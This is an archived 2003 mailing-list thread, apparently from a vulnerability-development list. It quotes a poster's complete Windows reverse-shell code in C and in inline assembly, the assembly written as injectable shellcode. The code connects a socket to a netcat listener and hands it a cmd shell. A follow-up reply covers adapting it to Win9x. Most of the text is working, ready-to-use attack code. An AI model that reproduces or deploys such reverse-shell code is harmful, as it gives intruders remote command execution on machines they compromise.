Hello s7726, Saturday, February 8, 2003, 12:09:45 AM, you wrote: s> Could this work on a win9x machine? with some mods of course. namely command s> rather than cmd, or is this strictly an NT/2k thing? s> Thanx, s> Gavin S. s> -----Original Message----- s> From: NetNinja [mailto:netninjaat_private] s> Sent: Friday, February 07, 2003 4:45 AM s> To: vuln-devat_private s> Subject: Windows reverse Shell #2 s> Hello folks, s> Thnx everyone for ur replies. s> Today i found time to have a careful look at my reverse shell C source s> code. The problem that i had was very simple. In my C source i forgot to s> initialize the STARTUPINFO struct to zero. That was the problem. 3APA3A's s> code did initialize that struct, so big thnx to him. Another thing s> u have to do is to cast the socket handle returned from the WSASocket call to s> ptr type and pass it on to stdInput, stdOutput and stdErr of the s> STARTUPINFO struct. s> That's it! s> If anyone is interested in a reverse cmd shell for windows i have s> included both C and inline asm versions. so have a look at them. s> ---- C --------------- s> /* s> reverse cmd shell s> Will spit back command shell on ur listening netcat s> on ur localhost (127.0.0.2) port 55 s> set up ur netcat eg. 
nc -l -p 55 -vv s> Adik (netninjaat_private) s> http://netninja.to.kg s> */ s> #include <winsock2.h> s> #include <stdio.h> s> #pragma comment(lib,"ws2_32") s> void main(int argc, char *argv[]) s> { s> WSADATA wsaData; s> SOCKET hSocket; s> STARTUPINFO si; s> PROCESS_INFORMATION pi; s> struct sockaddr_in adik_sin; s> memset(&adik_sin,0,sizeof(adik_sin)); s> memset(&si,0,sizeof(si)); s> WSAStartup(MAKEWORD(2,0),&wsaData); s> hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL); s> adik_sin.sin_family = AF_INET; s> adik_sin.sin_port = htons(55); s> adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1"); s> connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin)); s> si.cb = sizeof(si); s> si.dwFlags = STARTF_USESTDHANDLES; s> si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket; s> CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi); s> ExitProcess(0); s> } s> ------[ end C ]-------------- s> ----[ inline ASM ]------ s> /* s> reverse cmd shell s> inline asm version s> reverse cmd shell on address 127.0.0.1 port 55 s> Adik (netninjaat_private) s> http://netninja.to.kg s> */ s> #include <winsock2.h> s> #include <stdio.h> s> #pragma comment(lib,"ws2_32") s> #define GP 0x77E7B332 s> #define LL 0x77E7D961 s> #define CreateProcessA [ebp-8] s> #define ExitProcess [ebp-0ch] s> #define WSASocketA [ebp-10h] s> #define connect [ebp-14h] s> #define CMD_STR [ebp-18h] s> #define PORT 0x3700 //(htons(55)) here u gotta s> reverse byte order 0x0037=3700 s> #define IPADDR 0x0100007F // s> 7F000001//(inet_addr("127.0.0.1")) s> void main(int argc, char *argv[]) s> { s> char ptr[] = "kernel32\0CreateProcessA\0ExitProcess\0\0" s> "ws2_32\0WSASocketA\0connect\0\0\0cmd\0\0\0"; s> char *i=ptr; s> WSADATA wsaData; s> WSAStartup(MAKEWORD(2,0),&wsaData); //initialize s> winsock, this is not done below s> // usually when u inject ur shellcode into remote process s> // socket is already initialized s> __asm s> { s> mov edi, i s> dec edi s> push ebp s> mov ebp,esp s> 
sub esp,0x20 s> mov ecx,ebp s> sub ecx,4h s> push ecx s> load_lib: s> inc edi s> cmp byte ptr[edi],0 s> je done_loadin s> push edi s> mov eax, LL s> call eax //LoadLibrary("Lib") s> mov [ebp-4],eax //places lib handle into ebp-4 s> xor eax,eax s> repne scasb s> load_func: s> cmp byte ptr[edi],0 s> je load_lib s> push edi s> mov ebx, dword ptr[ebp-4] //lib handle s> push ebx s> mov eax, GP s> call eax s> //GetProcAddress("Function") s> pop ecx s> sub ecx,4 s> mov dword ptr[ecx], eax s> push ecx s> xor eax,eax s> repne scasb s> jmp load_func s> done_loadin: s> xor eax,eax s> inc edi s> mov dword ptr[ebp-18h],edi s> mov ecx,50 //make some s> space for structs s> push_em: s> push eax s> loop push_em s> push 0x1 s> push 0x2 s> call WSASocketA s> mov ebx, eax //copies sockethandle returned into s> ebx s> //ebp-20h s> mov dword ptr[ebp-40h],0x2 s> //sockaddr_in s> mov word ptr[ebp-3Eh],PORT s> mov dword ptr[ebp-3Ch],IPADDR s> //mov dword ptr[ebp-40h],process_information s> mov dword ptr[ebp-94h],0x44 //sizeof startupinfo s> mov dword ptr[ebp-68h],0x100 //dwFlags s> mov dword ptr[ebp-5Ch],ebx //stdio s> mov dword ptr[ebp-58h],ebx //stdout s> mov dword ptr[ebp-54h],ebx //stderr s> push 0x10 s> //sizeof sockaddr_in s> lea edx, dword ptr[ebp-40h] s> push edx s> //ptr to sockaddr_in s> push ebx s> //socket handle s> call connect s> lea edx,dword ptr[ebp-50h] s> push edx //push s> proc_info s> lea edx,dword ptr[ebp-94h] s> push edx //push ptr s> to startupinfo s> xor edx,edx s> push edx s> push edx s> push edx s> inc edx s> //inheritHandles = true s> push edx s> dec edx s> push edx s> push edx s> mov eax,CMD_STR //ptr to "cmd" str s> push eax s> push edx s> call CreateProcessA s> push edx s> call ExitProcess s> } s> } s> ----[ end ]------ s> -- s> Best regards, s> Adik (NetNinja) mailto:netninjaat_private When i put command.com instead of cmd.exe as a parameter to CreateProcess, reverse commandshell appeared on my nc, however i failed to execute command and c the results. 
In addition to that, my nc stopped responding and CPU usage jumped to 100%, so I had to shut it down. But you can try playing and poking around with it; perhaps you will see different results. -- Best regards, NetNinja mailto:netninjaat_private